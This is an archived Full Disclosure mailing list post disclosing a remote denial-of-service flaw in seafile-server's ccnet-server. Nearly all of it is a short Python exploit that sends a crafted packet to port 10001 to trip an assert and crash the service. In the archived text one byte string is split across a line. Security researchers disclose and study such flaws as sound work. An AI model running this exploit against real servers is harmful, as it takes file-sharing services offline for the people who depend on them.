full-disclosure - [FD] DoS seafile-server 3.1.5 ( ccnet-server

Open Source and information security mailing list archives

Date: Wed, 17 Sep 2014 11:55:48 +0400
From: nop nop <r3t5et@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] DoS seafile-server 3.1.5 ( ccnet-server - assert)

# Exploit Title: ccnet-server remote DoS (assert) in seafile-server  3.1.5
# Date: Sep 4, 2014
# Exploit Author: retset
# Vendor Homepage: seafile.com
# Software Link:
https://bitbucket.org/haiwen/seafile/downloads/seafile-server_3.1.4_win32.tar.gz
# Version: seafile-server 3.1.4  (mb <= 3.1.4)
# Tested on: Windows 7/seafile-server 3.1.5

import socket
import sys


ip = sys.argv[1]
addr = (ip, 10001)
s = socket.create_connection(addr)

dos = '\x00\x04\x00\x00\x00\x00\x03\
xe8'
dos += '\x00' * 1001

s.send(dos)
print repr(s.recv(1024))


s.close()


#@...set

_______________________________________________
Sent through the Full Disclosure mailing list
http://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/

lists.openwall.net		lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC
Open Source and information security mailing list archives